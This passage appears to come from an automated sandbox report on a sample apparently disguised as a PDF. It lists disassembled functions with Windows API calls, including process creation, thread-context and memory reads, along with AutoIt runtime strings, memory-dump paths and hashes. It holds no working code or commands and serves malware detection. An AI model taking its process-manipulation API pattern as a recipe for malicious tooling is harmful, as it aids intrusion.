                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    • Opcode ID: 314c7ebdfb0cd5982ef3d556dc2612be6b2735c25161934ec7e40a1b19b83111
                                    • Instruction ID: a5d9fe88c894fa06cf99d6d2aa1cec84a561efc596bbddf40b75eebb207ab978
                                    • Opcode Fuzzy Hash: 314c7ebdfb0cd5982ef3d556dc2612be6b2735c25161934ec7e40a1b19b83111
                                    • Instruction Fuzzy Hash: 5EF09672900A059AD7216B798C0275E77A35F40B74F5D420BA464AB3C1CF7CC902BB55
                                    Function 00F8129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F81A5B
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F81AF1
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F81B13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                    • Instruction ID: cc4b6981838c7506d080724858367451ce51ab36be3a2e4bfd377e4c447993eb
                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                    • Instruction Fuzzy Hash: CE12DE24E18658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A5E77A4F81CB5A
                                    Function 00FBF3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 167d8358989cf1b4bd5810d68e5340966c2236654bad3477ad7a7e1df3c2db7a
                                    • Instruction ID: 82d3b328cf97a8e840ed26560edbb9af23b56f3ce5f6a5ea187d07e4cf2d669e
                                    • Opcode Fuzzy Hash: 167d8358989cf1b4bd5810d68e5340966c2236654bad3477ad7a7e1df3c2db7a
                                    • Instruction Fuzzy Hash: 05618A71A0020ADFDB20EF65C880BBBB7E5EF04310F188169E9069B291E775ED59EF50
                                    Function 00FC2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07885c29da509da0d31f315673bbb548eb0347ca98db61cc639e9b53af7785d9
                                    • Instruction ID: 0374e772ec6502e2bb5d86e44b9c6ac5d70924437a00a5b4f8b3abea27898dfa
                                    • Opcode Fuzzy Hash: 07885c29da509da0d31f315673bbb548eb0347ca98db61cc639e9b53af7785d9
                                    • Instruction Fuzzy Hash: 34519F35600605ABCF14EB55CD92FAD77A6EF85720F188168F946AB392CF38ED04EB41
                                    Function 00FB766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 11c29b0f3fe12c11882c4c838d6bb1aca2612202df9aecf9aabe0f6fa49cd225
                                    • Instruction ID: c10ec855df883f44d28368c69df29b22b0b93d218c974346f0d6443dc1c2ac0c
                                    • Opcode Fuzzy Hash: 11c29b0f3fe12c11882c4c838d6bb1aca2612202df9aecf9aabe0f6fa49cd225
                                    • Instruction Fuzzy Hash: 4C318779608B02DFC724AF1AD490A61F7A1FF48320B24C56EE959CB755EB30D881EF94
                                    Function 00FB5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00FB5CF6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 76c0e5b6f4b5e624eda1180d7867f83ceeb67bdc216f270a5230b6fc6cc2b8b0
                                    • Instruction ID: 06c95c9e4ecbfc76f43bb28767a83db4f3128874dc419e2f9dfe029216511201
                                    • Opcode Fuzzy Hash: 76c0e5b6f4b5e624eda1180d7867f83ceeb67bdc216f270a5230b6fc6cc2b8b0
                                    • Instruction Fuzzy Hash: E5315E71A00B0AABCB18CF6AC48479DB7B6FF48720F148619D81993750D775B950EF90
                                    Function 00FF00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: ba6025c0e788d4d6589e84661d50de6a0c93268fe1696994596ae85fb482e408
                                    • Instruction ID: 72310485c9287d9091670b0a93698618a0afff6c04565efadddbaead903d947f
                                    • Opcode Fuzzy Hash: ba6025c0e788d4d6589e84661d50de6a0c93268fe1696994596ae85fb482e408
                                    • Instruction Fuzzy Hash: B4413474908341CFDB24DF15C488B5ABBE1BF49318F09889CE9894B362C776E845DF52
                                    Function 00FB79AB Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                    • Instruction ID: 231ce873eae8a8550a2f204a995687cfba2d0b60a6840146e2a9fcd19f583253
                                    • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                    • Instruction Fuzzy Hash: A311E432609205AFC714EF19C881DAEB7ADEF85360724851AE915DB3A0DB36EC11EB90
                                    Function 00FB4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00FB4D4D
                                      • Part of subcall function 00FD548B: __wfsopen.LIBCMT ref: 00FD5496
                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FB4F6F
                                      • Part of subcall function 00FB4CC8: FreeLibrary.KERNEL32(00000000), ref: 00FB4D02
                                      • Part of subcall function 00FB4DD0: _memmove.LIBCMT ref: 00FB4E1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load__wfsopen_memmove
                                    • String ID:
                                    • API String ID: 1396898556-0
                                    • Opcode ID: 7e92c118be2e6a23e5f169b4e2250dabe43b329be9404780b96d2c4a77214406
                                    • Instruction ID: 7c435b83fde01cdcd8fb9bddac2ac462ddc3aae6420aeea1d16d152b30ec353a
                                    • Opcode Fuzzy Hash: 7e92c118be2e6a23e5f169b4e2250dabe43b329be9404780b96d2c4a77214406
                                    • Instruction Fuzzy Hash: A211EB31A00206AACF14FF72CD12FEE77A99F44B10F108429F54197182DA796A05BFA1
                                    Function 00FF01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 3bc2f8caf1f11ce5889684a055a356d894b84363ed3f9ae715c4aa4abcdc7791
                                    • Instruction ID: 14b20252e1d20f232896b0ba7e65f44d1dd0b27d9715a5e4eaa47425ab714e3d
                                    • Opcode Fuzzy Hash: 3bc2f8caf1f11ce5889684a055a356d894b84363ed3f9ae715c4aa4abcdc7791
                                    • Instruction Fuzzy Hash: 15211574908341DFCB24DF15C844B5ABBE1BF84314F058958E98947762D735E849EF52
                                    Function 00FD0941 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FD09F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID:
                                    • API String ID: 82841172-0
                                    • Opcode ID: 40e7318c80454619ffc0c6a5072945de8cba92b3fb7d048b1cdc630dc4b0c969
                                    • Instruction ID: 59062fc8cc27c0ca99f871e0b130bfa8051665d6e8cfa837f5e4046c3b2b69fc
                                    • Opcode Fuzzy Hash: 40e7318c80454619ffc0c6a5072945de8cba92b3fb7d048b1cdc630dc4b0c969
                                    • Instruction Fuzzy Hash: 8101297284F3C18FC31287B0987A6D23FB9DE4722532841DF9C828B663E45A581BA752
                                    Function 00FB5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00FB5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FB5D76
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: 535fd316ad02168c47c11c068822439f2ca7132ec74becc249089e34f0300d23
                                    • Instruction ID: 11a8d46ee7fdec32a4341b5fed349bf086f3825da9124b5e05b1ca25b6e5f685
                                    • Opcode Fuzzy Hash: 535fd316ad02168c47c11c068822439f2ca7132ec74becc249089e34f0300d23
                                    • Instruction Fuzzy Hash: 6A113D31604B019FD3308F16D444BA2B7E5EF49B60F10CA1DE9AA86650D779E945DF60
                                    Function 00FD4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    • __lock_file.LIBCMT ref: 00FD4AD6
                                      • Part of subcall function 00FD8D68: __getptd_noexit.LIBCMT ref: 00FD8D68
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: 6ad88ea0627119d6a7e34d84d560d5d73912ba8f262262f6c3142479e8a7cb5f
                                    • Instruction ID: 021f61fe42bc3920badad39f4f844eaf8a0d46a98aad3eeaeda6b6a0042ab9d2
                                    • Opcode Fuzzy Hash: 6ad88ea0627119d6a7e34d84d560d5d73912ba8f262262f6c3142479e8a7cb5f
                                    • Instruction Fuzzy Hash: CBF0DC31900209ABDB61AF658C063AE37A3AF00365F0C8106B424AA2D1CBBC9A11FB41
                                    Function 00FB4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,010762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FB4FDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: f3c2e6cf948c2063a3c9c950332c8167a44cbe222437f967c5a8b2dcbcda0b2d
                                    • Instruction ID: c91251c9fa03f907d419176d73ff23bda6e5ec60836af9c9a70f64553d95cf1f
                                    • Opcode Fuzzy Hash: f3c2e6cf948c2063a3c9c950332c8167a44cbe222437f967c5a8b2dcbcda0b2d
                                    • Instruction Fuzzy Hash: 68F03071505712CFC7349F65E594962BBE5BF043293248A3EE1D683A12C771A840EF40
                                    Function 00FD09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FD09F4
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LongNamePath_memmove
                                    • String ID:
                                    • API String ID: 2514874351-0
                                    • Opcode ID: b128c82ed9b0423929b73f64e7275557719c4ad25c068ef9230498e32bc6175f
                                    • Instruction ID: 2df337e3804ca3c22645a5812dd2d7fa90ef14ad6dd5de4acad0ef82ac1c79a3
                                    • Opcode Fuzzy Hash: b128c82ed9b0423929b73f64e7275557719c4ad25c068ef9230498e32bc6175f
                                    • Instruction Fuzzy Hash: 55E08636D0422957C720E5599C05FFA77ADDFC8790F0401B5FC4CD7248D9659C818691
                                    Function 01019129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 85a266c19ac15f6dd4f37f244161312340f338b31e1d7e5613d3c154e10e17cf
                                    • Instruction ID: f35e48b4bc3a6a4d80d421c5221a5c6b5e36bf5c8cc4877b949b2e0850341a51
                                    • Opcode Fuzzy Hash: 85a266c19ac15f6dd4f37f244161312340f338b31e1d7e5613d3c154e10e17cf
                                    • Instruction Fuzzy Hash: D3E092B1104B005FEB758A28D810BE377E1BB06319F00085DF2DA83342EB667881D759
                                    Function 00FB5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00FEE16B,?,?,00000000), ref: 00FB5DBF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: bb1024ba84f895e190e9d36430bb414dc77cec921702e249eae42ad354320dab
                                    • Instruction ID: 215a46644ad7f5e6c116e5ed31cc778ae101e73a9dcd8da9d6034c41c20313f7
                                    • Opcode Fuzzy Hash: bb1024ba84f895e190e9d36430bb414dc77cec921702e249eae42ad354320dab
                                    • Instruction Fuzzy Hash: 9DD0C77464020CBFE710DB80DC46FA9777CD705710F100194FD0456290D6F27D508795
                                    Function 00FD548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __wfsopen
                                    • String ID:
                                    • API String ID: 197181222-0
                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction ID: 96a75311a17050bfd4a51ec64539b3788114d3949f307d62acf988e11e066862
                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction Fuzzy Hash: 8CB0927684020C77DE012E82EC02A593B1A9B41A79F848021FB0C18262A677A6A0A68A
                                    Function 00FF220E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNELBASE(00000104,?), ref: 00FF221A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: PathTemp
                                    • String ID:
                                    • API String ID: 2920410445-0
                                    • Opcode ID: 187f9f275f914df0da359d7a9dd6d1e3e61e581770e93273f9af2165aeb0afe0
                                    • Instruction ID: f5ab0e3c4ff068ef0d71d8924c9f8b840d6ae8f7ba560674591676c4cc61f45c
                                    • Opcode Fuzzy Hash: 187f9f275f914df0da359d7a9dd6d1e3e61e581770e93273f9af2165aeb0afe0
                                    • Instruction Fuzzy Hash: EEC04C7185401ADBE715A650CC95BB8722CBF00701F1400D5764595150D9B45B40DF11
                                    Function 0101D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0101D46A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
